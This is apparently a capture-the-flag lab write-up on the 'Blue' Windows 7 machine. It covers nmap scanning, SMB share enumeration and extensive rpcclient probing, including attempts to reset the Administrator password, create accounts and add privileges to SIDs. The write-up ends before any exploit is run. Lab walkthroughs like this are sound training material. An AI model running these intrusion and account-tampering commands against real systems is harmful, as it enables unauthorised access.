Blue

Wanna cry?

First thing first, let's edit our hosts file:

sudo nano /etc/hosts

Now, instead of typing target IP, we can use blue.htb, it's more comfortable.

Now, let's connect to the VPN, so that we would be able to access the machine on the network:

sudo openvpn lab.ovpn

We can see that we have a successful connection:

To get out of the shell click Ctrl+Z and you wil see that job is stopped.

Let's:

List the running jobs

jobs -l

Move VPN job to background

bg 1

Check that the job is running

jobs -l

Check that we have a working VPN connection and that we can hit the target machine

ping -c 2 blue.htb

Stage 1: Enumeration

First thing first, let's enumerate our target and find as much of information as possible.

Before any target systems can be examined and attacked, they must first be identified. This process is often called enumeration. Here a penetration tester will enumerate the customer, application, or system they are testing. The common things we are hunting during this early stage include anything from open ports, login credentials, DNS records, protocols on our target, and even publicly available information.

nmap -sC -sV -p- -oN nmap_result.txt blue.htb

Let's give it a time to run, while it runs, I'll explain command that we are using:

nmap - is a free and open source utility for network discovery and security auditing that we are using to enumerate target. Documentation
1. -sC - Scan with default NSE scripts. Considered useful for discovery
2. -sV - Attempts to determine the version of the service running on port
3. -p- - Port scan all ports
4. -oN - Normal output to the file normal.fileCopied
5. nmap_results.txt - file name where scan result will be saved
6. blue.htb - remember us editing hosts file?

Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-09 18:32 EDT
Verbosity Increased to 1.
Verbosity Increased to 2.
Increasing send delay for 10.129.123.117 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.123.117 from 5 to 10 due to 11 out of 27 dropped probes since last increase.
Connect Scan Timing: About 22.20% done; ETC: 18:35 (0:01:49 remaining)
Discovered open port 49152/tcp on 10.129.123.117
Connect Scan Timing: About 26.32% done; ETC: 18:36 (0:02:51 remaining)
Discovered open port 49154/tcp on 10.129.123.117
Connect Scan Timing: About 30.49% done; ETC: 18:37 (0:03:27 remaining)
Increasing send delay for 10.129.123.117 from 10 to 20 due to max_successful_tryno increase to 5
Connect Scan Timing: About 32.85% done; ETC: 18:38 (0:04:07 remaining)
Connect Scan Timing: About 34.95% done; ETC: 18:39 (0:04:41 remaining)
Connect Scan Timing: About 37.10% done; ETC: 18:40 (0:05:07 remaining)
Connect Scan Timing: About 39.79% done; ETC: 18:41 (0:05:33 remaining)
Connect Scan Timing: About 46.69% done; ETC: 18:44 (0:06:01 remaining)
Discovered open port 49157/tcp on 10.129.123.117
Discovered open port 49156/tcp on 10.129.123.117
Discovered open port 49155/tcp on 10.129.123.117
Connect Scan Timing: About 62.00% done; ETC: 18:47 (0:05:26 remaining)
Connect Scan Timing: About 69.11% done; ETC: 18:47 (0:04:42 remaining)
Discovered open port 49153/tcp on 10.129.123.117
Connect Scan Timing: About 75.32% done; ETC: 18:48 (0:03:55 remaining)
Connect Scan Timing: About 81.05% done; ETC: 18:49 (0:03:07 remaining)
Connect Scan Timing: About 86.58% done; ETC: 18:49 (0:02:16 remaining)
Connect Scan Timing: About 91.75% done; ETC: 18:49 (0:01:25 remaining)
Connect Scan Timing: About 96.92% done; ETC: 18:50 (0:00:32 remaining)
Completed Connect Scan at 18:50, 1066.04s elapsed (65535 total ports)
Initiating Service scan at 18:50
Scanning 9 services on blue.htb (10.129.123.117)
Service scan Timing: About 44.44% done; ETC: 18:52 (0:01:09 remaining)
Completed Service scan at 18:51, 59.72s elapsed (9 services on 1 host)
NSE: Script scanning 10.129.123.117.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 9.92s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
Nmap scan report for blue.htb (10.129.123.117)
Host is up (0.054s latency).
Scanned at 2023-10-09 18:32:43 EDT for 1136s
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-10-09T22:51:32
|_  start_date: 2023-10-09T21:53:00
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53802/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 53040/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 62302/udp): CLEAN (Timeout)
|   Check 4 (port 12505/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-10-09T23:51:34+01:00
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 0s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1136.41 seconds

Now we know that we can enumerate more in to SMB and that it's an Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) that we can search some exploits available.

smbclient -L \\\\blue.htb\\

We have 5 SMB shares. Let's enumerate them too.

smbclient //blue.htb/ADMIN$

smbclient //blue.htb/C$

smbclient //blue.htb/IPC$

smbclient //blue.htb/Share

smbclient //blue.htb/Users

Windows keep a backup of all the activities and changes such as accessing folders, opening files, network shares, etc., in netuser.dat.LOG1 and netuser.dat.LOG2 during the live session and saves them into NTUSER.DAT during Log off. The NTUSER.DAT is the primary file for the HKEY_CURRENT_USER hive and keeps user-related information; however, Windows is not updating this file in real-time.

And this could be a rabbit hole as well.

mget NTUSER.DAT

What are the options?

Didn't find anything interesting so far:

ls AppData\
ls AppData\Loal
ls AppData\Local
ls AppData\Roaming
ls AppData\Roaming\
ls AppData\Roaming\Media Center Programs\
ls AppData\Roaming\Microsoft\
ls AppData\Roaming\Microsoft\Windows\
ls AppData\Roaming\Microsoft\Windows\Cookies\
ls AppData\Roaming\Microsoft\Windows\Network Shortcuts\
ls AppData\Roaming\Microsoft\Windows\Network \\Shortcuts\
ls AppData\Roaming\Microsoft\Windows\"Network Shortcuts"\
ls AppData\Roaming\Microsoft\Windows\Recent\
ls AppData\Roaming\Microsoft\Windows\SendTo\
ls AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget 
44: mget AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget 
45: mget AppData\Roaming\Microsoft\Windows\SendTo\"Compressed (zipped) Folder.ZFSendToTarget" 
46: ls AppData\Roaming\Microsoft\Windows\SendTo\"Compressed (zipped) Folder.ZFSendToTarget" 
47: ls AppData\Roaming\Microsoft\Windows\SendTo\"Fax Recipient.lnk"
48: mget AppData\Roaming\Microsoft\Windows\SendTo\"Fax Recipient.lnk"
49: mget AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail 
50: mget AppData\Roaming\Microsoft\Windows\SendTo\"Mail Recipient.MAPIMail" 
51: mget AppData\Roaming\Microsoft\Windows\SendTo\'Mail Recipient.MAPIMail'
52: mget AppData\Roaming\Microsoft\Windows\
53: ls AppData\Roaming\Microsoft\Windows\
54: ls AppData\Roaming\Microsoft\Windows\Templates\
55: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\
56: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\
57: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
58: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
59: mget AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
60: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
61: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
62: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\"System Tools"\
63: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
64: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\
65: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\
66: ls AppData\Roaming\Microsoft\Windows\
67: ls AppData\Roaming\Microsoft\Windows\"Network Shortcuts"\
68: ls AppData\Roaming\Microsoft\Windows\
69: ls AppData\Roaming\Microsoft\
70: ls AppData\Roaming\Microsoft\"Internet Explorer"\
71: ls AppData\Roaming\Microsoft\"Internet Explorer"\"Quick Launch"\
72: ls AppData\Roaming\Microsoft\
73: ls AppData\Roaming\
74: ls AppData\Roaming\"Media Center Programs"\
75: ls AppData\

smbmap -u 'Harris' -p 'password' -R -H blue.htb

This is really better and faster than going manually. As well as we can see what permissions we would have in the directories and what we can try to do with the files and can we make an upload anywhere.

[+] Guest session   	IP: blue.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	Share                                             	READ ONLY	
	.\Share\*
	dr--r--r--                0 Fri Jul 21 02:44:22 2017	.
	dr--r--r--                0 Fri Jul 21 02:44:22 2017	..
	Users                                             	READ ONLY	
	.\Users\*
	dw--w--w--                0 Fri Jul 21 02:56:23 2017	.
	dw--w--w--                0 Fri Jul 21 02:56:23 2017	..
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Default
	fr--r--r--              174 Fri Jul 14 18:32:23 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Public
	.\Users\Default\*
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	.
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	AppData
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Desktop
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Documents
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Downloads
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Favorites
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Links
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Music
	fr--r--r--           262144 Sun Jul 16 16:22:24 2017	NTUSER.DAT
	fr--r--r--             1024 Fri Jul 14 18:32:24 2017	NTUSER.DAT.LOG
	fr--r--r--           189440 Sun Jul 16 16:22:24 2017	NTUSER.DAT.LOG1
	fr--r--r--                0 Fri Jul 14 18:37:45 2017	NTUSER.DAT.LOG2
	fr--r--r--            65536 Fri Jul 14 18:32:24 2017	NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
	fr--r--r--           524288 Fri Jul 14 18:32:24 2017	NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
	fr--r--r--           524288 Fri Jul 14 18:32:23 2017	NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Pictures
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Saved Games
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Videos
	.\Users\Default\AppData\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Local
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Roaming
	.\Users\Default\AppData\Local\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Microsoft
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Temp
	.\Users\Default\AppData\Local\Microsoft\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Windows
	.\Users\Default\AppData\Local\Microsoft\Windows\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	GameExplorer
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	History
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Temporary Internet Files
	.\Users\Default\AppData\Roaming\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Media Center Programs
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Microsoft
	.\Users\Default\AppData\Roaming\Microsoft\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Internet Explorer
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Windows
	.\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Quick Launch
	.\Users\Default\AppData\Roaming\Microsoft\Windows\*
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	.
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	..
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Cookies
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Network Shortcuts
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Printer Shortcuts
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Recent
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	SendTo
	dw--w--w--                0 Fri Jul 14 18:37:45 2017	Start Menu
	dr--r--r--                0 Fri Jul 14 18:37:45 2017	Templates
	.\Users\Public\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              174 Fri Jul 21 02:40:38 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Documents
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Downloads
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Favorites
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Libraries
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Music
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Pictures
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Recorded TV
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Videos
	.\Users\Public\Documents\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              278 Fri Jul 21 02:40:38 2017	desktop.ini
	.\Users\Public\Downloads\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              174 Fri Jul 21 02:40:38 2017	desktop.ini
	.\Users\Public\Libraries\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--               88 Fri Jul 21 02:40:38 2017	desktop.ini
	fr--r--r--              876 Fri Jul 21 02:40:38 2017	RecordedTV.library-ms
	.\Users\Public\Music\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              380 Fri Jul 21 02:40:38 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Sample Music
	.\Users\Public\Music\Sample Music\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              586 Fri Jul 21 02:40:38 2017	desktop.ini
	fr--r--r--          8414449 Fri Jul 21 02:40:38 2017	Kalimba.mp3
	fr--r--r--          4113874 Fri Jul 21 02:40:38 2017	Maid with the Flaxen Hair.mp3
	fr--r--r--          4842585 Fri Jul 21 02:40:38 2017	Sleep Away.mp3
	.\Users\Public\Pictures\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              380 Fri Jul 21 02:40:38 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Sample Pictures
	.\Users\Public\Pictures\Sample Pictures\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--           879394 Fri Jul 21 02:40:38 2017	Chrysanthemum.jpg
	fr--r--r--           845941 Fri Jul 21 02:40:38 2017	Desert.jpg
	fr--r--r--             1120 Fri Jul 21 02:40:38 2017	desktop.ini
	fr--r--r--           595284 Fri Jul 21 02:40:38 2017	Hydrangeas.jpg
	fr--r--r--           775702 Fri Jul 21 02:40:38 2017	Jellyfish.jpg
	fr--r--r--           780831 Fri Jul 21 02:40:38 2017	Koala.jpg
	fr--r--r--           561276 Fri Jul 21 02:40:38 2017	Lighthouse.jpg
	fr--r--r--           777835 Fri Jul 21 02:40:38 2017	Penguins.jpg
	fr--r--r--           620888 Fri Jul 21 02:40:38 2017	Tulips.jpg
	.\Users\Public\Recorded TV\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--               80 Fri Jul 21 02:40:38 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Sample Media
	.\Users\Public\Recorded TV\Sample Media\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              171 Fri Jul 21 02:40:38 2017	desktop.ini
	fr--r--r--          9699328 Fri Jul 21 02:40:38 2017	win7_scenic-demoshort_raw.wtv
	.\Users\Public\Videos\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              380 Fri Jul 21 02:40:38 2017	desktop.ini
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	Sample Videos
	.\Users\Public\Videos\Sample Videos\*
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	.
	dw--w--w--                0 Fri Jul 21 02:40:38 2017	..
	fr--r--r--              326 Fri Jul 21 02:40:38 2017	desktop.ini
	fr--r--r--         26246026 Fri Jul 21 02:40:38 2017	Wildlife.wmv

smbmap -u 'Harris' -p 'password' -H blue.htb --download 'Users\Public\Recorded TV\Sample Media\desktop.ini'

I think I've pushed max I could with smbclient and smbmap, time to dig with rpcclient:

rpcclient blue.htb
Enter WORKGROUP\user's password: 
Bad SMB2 signature for message
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] 35 C5 C6 69 F1 0A A9 6B   D1 31 A7 B8 16 FA 35 CA   5..i...k .1....5.
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

rpcclient -U Harris --signing=off blue.htb
Enter WORKGROUP\Harris's password: 
rpcclient $>

And let's have a look in to some SANS cheat sheet here

I will share here only if I get any data out of enumerating RPC:

rpcclient $> enumdomains
name:[haris-PC] idx:[0x0]
name:[Builtin] idx:[0x0]

Total of 3 users. There was a Forced Logging off on the Server.

Didn't get anything about users and groups. But we know we have Haris, Administrator.

It should be possible to extract details about a particular group, and we should have groups but I don't get output. This information includes the Group Name, Description, Attributes, and the number of members in that group. Let's try:

rpcclient $> querygroup 0x200

Now, I will try random guessing:

rpcclient $> querygroup 0x201
	Group Name:	None
	Description:	Ordinary users
	Group Attribute:7
	Num Members:3

rpcclient $> enumprivs
found 34 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)

We have 34 privileges assigned.

To enumerate the Password Properties on the domain, the

getdompwinfo

command can be used. This is made from the words get domain password information. This will help in getting the information such as the kind of password policies that have been enforced by the Administrator in the domain. It is possible to enumerate the minimum password length and the enforcement of complex password rules. If these kinds of features are not enabled on the domain, then it is possible to brute force the credentials on the domain.

rpcclient $> lookupnames Administrator
Administrator S-1-5-21-319597671-3711062392-2889596693-500 (User: 1)

rpcclient $> lookupnames Haris
Haris S-1-5-21-319597671-3711062392-2889596693-1000 (User: 1)

It is also possible to get the password properties of individual users. I will try to do random guess again.

getusrdompwinfo

We have "access denied" meaning that someone is 0x1f4. #0x1f4

rpcclient $> queryuser Administrator

lsaquery

rpcclient $> lookupnames Administrator
Administrator S-1-5-21-319597671-3711062392-2889596693-500 (User: 1)

rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-500
S-1-5-21-319597671-3711062392-2889596693-500 haris-PC\Administrator (1)

lsaenumsid

The SID of a user is the security Identifier that can be used for a lot of elevating privileges and minting tickets attacks.

found 12 SIDs

S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-0
S-1-5-6
S-1-5-32-559
S-1-5-32-555
S-1-5-32-551
S-1-5-32-545
S-1-5-32-544
S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-20
S-1-5-19
S-1-1-0

rpcclient $> lookupsids S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420 NT SERVICE\WdiServiceHost (5)

rpcclient $> lookupsids S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420 NT SERVICE\WdiServiceHost (5)

rpcclient $> lookupsids S-1-5-80-0
S-1-5-80-0 NT SERVICE\ALL SERVICES (5)

rpcclient $> lookupsids S-1-5-6
S-1-5-6 NT AUTHORITY\SERVICE (5)

rpcclient $> lookupsids S-1-5-32-559
S-1-5-32-559 BUILTIN\Performance Log Users (4)

rpcclient $> lookupsids S-1-5-32-555
S-1-5-32-555 BUILTIN\Remote Desktop Users (4)

rpcclient $> lookupsids S-1-5-32-551
S-1-5-32-551 BUILTIN\Backup Operators (4)

rpcclient $> lookupsids S-1-5-32-545
S-1-5-32-545 BUILTIN\Users (4)

rpcclient $> lookupsids S-1-5-32-544
S-1-5-32-544 BUILTIN\Administrators (4)

rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-21-319597671-3711062392-2889596693-501 haris-PC\Guest (1)

rpcclient $> lookupsids S-1-5-20
S-1-5-20 NT AUTHORITY\NETWORK SERVICE (5)

rpcclient $> lookupsids S-1-5-19
S-1-5-19 NT AUTHORITY\LOCAL SERVICE (5)

rpcclient $> lookupsids S-1-1-0
S-1-1-0 \Everyone (5)

Can we add our own domain user?

rpcclient $> createdomuser
Usage: createdomuser username [access mask]

Access Mask Format - Win32 appsMicrosoftLearn

Can we change existing user password?

setuserinfo2 Administrator 24 Password@1

chgpasswd Administrator admin admin123

enumalsgroups builtin

Do we have a Network Shares on the Domain?

rpcclient $> netshareenum
result was WERR_ACCESS_DENIED

rpcclient $> netshareenumall
result was WERR_ACCESS_DENIED

rpcclient $> netsharegetinfo 
Usage: netsharegetinfo sharename [infolevel 1|2|502|1005]

rpcclient $> netsharegetinfo *
result was WERR_ACCESS_DENIED

enumdomgroups
enumdomusers

No output for these and because of that we cant enumerate further with, as example:

queryusersgroups 0x44f
querygroupmem 0x201
querydispinfo

Can we create domain group?

rpcclient $> createdomgroup Purp

lookupdomain haris-PC
SAMR_LOOKUP_DOMAIN: Domain Name: haris-PC Domain SID: S-1-5-21-319597671-3711062392-2889596693

Since the user and password-related information is stored inside the SAM file of the Server. It is possible to enumerate the SAM data through the rpcclient as well. When provided with the username to the samlookupnames command, it can extract the RID of that particular user. If used the RID is the parameter, the samlookuprids command can extract the username relevant to that particular RID.

samlookupnames domain Administrator

rpcclient $> lsaquery
Domain Name: WORKGROUP
Domain Sid: (NULL SID)

rpcclient $> dsroledominfo
Machine Role = [0]
Directory Service not running on server

Passing the SID as a parameter in the lsacreateaccount command will enable me to create an account object as shown in the image below.

rpcclient $> lookupnames Administrator
Administrator S-1-5-21-319597671-3711062392-2889596693-500 (User: 1)

rpcclient $> lsacreateaccount S-1-5-21-319597671-3711062392-2889596693-500
result was NT_STATUS_ACCESS_DENIED

It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well.

rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-21-319597671-3711062392-2889596693-501 haris-PC\Guest (1)

rpcclient $> lsaenumacctrights 
Usage: lsaenumacctrights SID

rpcclient $> lsaenumacctrights S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-6
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-1-0
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-19
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-20
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-32-544
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-32-545
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-32-551
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-32-555
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-32-559
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-6
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaenumacctrights S-1-5-80-0
result was NT_STATUS_ACCESS_DENIED

Can I manipulate the privileges any SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether?

rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-21-319597671-3711062392-2889596693-501 haris-PC\Guest (1)

rpcclient $> lsaaddpriv S-1-5-21-319597671-3711062392-2889596693-501 SeCreateTokenPrivilege
result was NT_STATUS_ACCESS_DENIED

rpcclient $> lsaaddacctrights S-1-5-21-319597671-3711062392-2889596693-1000 SeCreateTokenPrivilege
result was NT_STATUS_ACCESS_DENIED

